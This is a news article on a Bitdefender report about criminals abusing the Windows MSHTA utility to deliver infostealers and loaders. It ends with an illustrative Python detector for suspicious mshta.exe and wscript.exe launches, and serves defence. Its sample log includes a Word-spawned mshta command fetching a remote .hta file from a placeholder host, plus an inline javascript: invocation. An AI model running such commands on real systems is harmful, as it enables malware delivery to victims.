- Bitdefender reports increasing abuse of the legacy MSHTA utility to spawn infostealers and malware loaders.
- Campaigns range from simple commodity threats like LummaStealer to advanced persistence tools like PurpleFox.
- Defenders are urged to restrict outdated script utilities and implement layered security controls to detect malicious script activity.
Researchers say cybercriminals are increasingly using a legitimate Windows legacy tool to deploy information stealers and malware loaders.
A new report from Bitdefender claims that since early 2026, there has been an increase in activity related to a Windows utility called Microsoft HTML Application Host (MSHTA), a legitimate utility that runs special HTML-based application files known as HTA.
While regular web pages open in a browser, HTA files interact directly with the Windows operating system and can execute scripts with elevated privileges.
Simple and complex threats
MSHTA is an old tool that was originally designed for light administrative and desktop tasks but, like many other legacy tools, is abused to run malicious scripts, download malware, or bypass security controls.
“Since the beginning of the year, we have seen an increase in MSHTA-related activity,” Bitdefender said. “Given that legitimate use of this utility is gradually fading, this trend likely reflects an increase in malicious activity rather than renewed administrative adoption.”
The activity the researchers analyzed spans multiple categories of malware, covering both simple and more complex campaigns. At the “simpler” end, MSHTA is widely used to deliver commodity information stealers such as Amatera or LummaStealer; it is also used for loaders such as CountLoader or Emmenthal.
When it comes to more advanced and persistent threats, Bitdefender saw criminals deploy ClipBanker and PurpleFox.
“This range of abuses highlights why MSHTA remains important to defenders: it is not a single malware family or intrusion model,” they explained. “It remains useful across the spectrum, from opportunistic malware delivery to long-term compromise.”
To defend against MSHTA-based attacks, Bitdefender said, organizations should combine user awareness with layered security controls. Users should avoid downloading untrusted files or running suspicious commands, while organizations should deploy security tools capable of detecting malicious scripts or command-line abuse.
The company also recommends restricting utilities like mshta.exe and wscript.exe whenever possible and replacing outdated scripting tools with modern alternatives to reduce the attack surface.
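As an added, illustrative example (not code from Bitdefender or TechRadar), the following Python checker applies the kind of command-line heuristics the report alludes to, over constructed process-creation records in an assumed "parent|image|command line" format; the parent-process list and indicator patterns are assumptions modelled on common LOLBin detection rules, not anything the report publishes.

```python
"""Flag suspicious mshta.exe / wscript.exe launches in process-creation logs."""
import re
from typing import List, Tuple

# Legacy script hosts the report recommends restricting.
LEGACY_SCRIPT_HOSTS = {"mshta.exe", "wscript.exe"}
# Parents from which a script-host launch is unexpected (assumed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
# Indicators: a remote URL handed to the host, or an inline script protocol handler.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)

# Constructed sample records (parent | image | command line); not real telemetry.
SAMPLE_LOG = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe C:\Tools\inventory.hta",
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\mshta.exe|mshta.exe http://example.invalid/update.hta",
    r"C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe javascript:window.close()",
    r"C:\Windows\System32\svchost.exe|C:\Windows\System32\notepad.exe|notepad.exe",
]


def classify(record: str) -> Tuple[bool, List[str]]:
    """Return (is_suspicious, reasons) for one 'parent|image|cmdline' record."""
    parent, image, cmdline = (f.strip() for f in record.split("|", 2))
    image_name = image.rsplit("\\", 1)[-1].lower()
    if image_name not in LEGACY_SCRIPT_HOSTS:
        return False, []  # benign-by-default: only the legacy hosts are examined
    parent_name = parent.rsplit("\\", 1)[-1]
    reasons = []
    if REMOTE_URL.search(cmdline):
        reasons.append("remote URL passed to script host")
    if INLINE_SCRIPT.search(cmdline):
        reasons.append("inline script protocol handler")
    if parent_name.lower() in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {parent_name}")
    return bool(reasons), reasons


def scan(records: List[str]) -> List[Tuple[str, List[str]]]:
    """Return every record that trips at least one indicator, with its reasons."""
    hits = []
    for rec in records:
        suspicious, reasons = classify(rec)
        if suspicious:
            hits.append((rec, reasons))
    return hits


if __name__ == "__main__":
    for rec, reasons in scan(SAMPLE_LOG):
        print(rec.split("|", 2)[2], "->", "; ".join(reasons))
```

A local .hta launched from Explorer (the first record) is deliberately not flagged, so that residual legitimate use does not drown the alert channel.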
